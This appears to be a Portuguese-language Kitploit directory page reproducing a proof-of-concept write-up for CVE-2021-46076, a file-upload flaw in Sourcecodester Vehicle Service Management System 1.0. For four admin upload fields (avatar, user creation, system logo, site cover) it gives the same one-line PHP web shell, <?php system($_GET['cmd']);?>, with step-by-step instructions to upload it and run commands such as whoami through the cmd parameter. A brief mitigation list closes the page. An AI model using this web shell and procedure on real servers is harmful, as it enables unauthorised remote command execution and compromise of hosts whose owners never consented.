Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 é vulnerável a upload de arquivos. Um atacante pode enviar um arquivo php malicioso em vários endpoints, levando à Execução de Código. | Kitploit
Ferramentas/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 é vulnerável a upload de arquivos. Um atacante pode enviar um arquivo php malicioso em vários endpoints, levando à Execução de Código.

Ver Repositório
4há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-46076

Título do Exploit: Vehicle Service Management System - 'Multiple' upload de arquivos leva à Execução de Código

Autor do Exploit: SANU P.L

CVE: CVE-2021-46076

CVSS: 8.8 ALTO

Referências:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

Descrição:

Sourcecodester Vehicle Service Management System 1.0 é vulnerável a upload de arquivos. Um atacante pode enviar um arquivo php malicioso em vários endpoints, o que leva à Execução de Código.

1. Vehicle Service Management System - 'Minha Conta' (/admin/?page=user)

Exploit:

  1. Entre no painel de administração http://localhost/vehicle_service/admin
  2. Navegue até a seção Minha Conta http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salve o código php acima como, por exemplo: Cmd.php
  2. Na seção Minha Conta, preencha todos os dados necessários e selecione o arquivo php em Avatar.
  3. Clique no botão Update.
  4. Abra a imagem do avatar em uma nova aba.
  5. Adicione o parâmetro cmd na URL e execute os comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Execute todos os comandos do sistema, por exemplo: id, whoami, pwd etc..

2. Vehicle Service Management System - 'Lista de Usuários' (/admin/?page=user/manage_user)

Exploit:

  1. Entre no painel de administração http://localhost/vehicle_service/admin
  2. Navegue até a seção Lista de Usuários e clique no botão Create New.

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salve o código php acima como, por exemplo: Cmd.php
  2. Na página Criar Novo Usuário, preencha todos os dados necessários e selecione o arquivo php em Avatar.
  3. Clique no botão Save.
  4. Abra a imagem do avatar em uma nova aba.
  5. Adicione o parâmetro cmd na URL e execute os comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Execute todos os comandos do sistema, por exemplo: id, whoami, pwd etc..

3. Vehicle Service Management System - 'Configurações - Logo do Sistema' (/admin/?page=system_info)

Exploit:

  1. Entre no painel de administração http://localhost/vehicle_service/admin
  2. Navegue até a seção Configurações http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salve o código php acima como, por exemplo: Cmd.php
  2. Na seção Configurações, preencha todos os dados necessários e selecione o arquivo php em Logo do Sistema.
  3. Clique no botão Update.
  4. Abra a imagem do Logo do Sistema em uma nova aba.
  5. Adicione o parâmetro cmd na URL e execute os comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Execute todos os comandos do sistema, por exemplo: id, whoami, pwd etc..

4. Vehicle Service Management System - 'Configurações - Capa do Site' (/admin/?page=system_info)

Exploit:

  1. Entre no painel de administração http://localhost/vehicle_service/admin
  2. Navegue até a seção Configurações http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salve o código php acima como, por exemplo: Cmd.php
  2. Na seção Configurações, preencha todos os dados necessários e selecione o arquivo php em Capa do Site.
  3. Clique no botão Update.
  4. Abra a imagem da Capa do Site em uma nova aba.
  5. Adicione o parâmetro cmd na URL e execute os comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Execute todos os comandos do sistema, por exemplo: id, whoami, pwd etc..

Impacto:

Um atacante pode enviar um arquivo php malicioso em vários endpoints, o que leva à Execução de Código.

Mitigação:

Recomenda-se implementar o seguinte:

  • Nunca aceite um nome de arquivo e sua extensão diretamente sem um filtro de lista branca.
  • Se não houver necessidade de caracteres Unicode, é altamente recomendável aceitar apenas caracteres alfanuméricos e apenas um ponto como entrada para o nome do arquivo e a extensão.
  • Limite o tamanho do arquivo a um valor máximo para evitar ataques de negação de serviço.
  • O diretório de upload não deve ter permissão de "execução".
  • Não dependa apenas da validação no lado do cliente.
Baixar ferramenta